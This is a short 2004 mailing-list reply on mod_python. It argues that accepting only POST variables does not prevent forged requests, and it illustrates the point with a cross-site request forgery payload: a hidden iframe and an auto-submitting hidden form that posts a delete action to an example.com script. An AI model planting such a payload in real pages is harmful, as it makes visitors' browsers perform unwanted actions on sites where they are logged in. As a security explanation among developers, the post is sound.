[mod_python] Questions on _call_ with mp servlets and python

mike bayer mike_mp at zzzcomputing.com
Fri Sep 3 17:26:39 EDT 2004

> On Friday 03 September 2004 20:35, David Fraser wrote:
> If you don't use the query string parameters when you are expecting POST
> variables, then your users are not susceptible to this form of attack.

sadly, not true:

<IFRAME width="0" height="0" src="myattack.html"></IFRAME>


<body onload = "myform.submit()">
<form name="myform" method="POST" action="http://www.example.com/script">
<input type="hidden" name="deletesomething" value="true">

More information about the Mod_python mailing list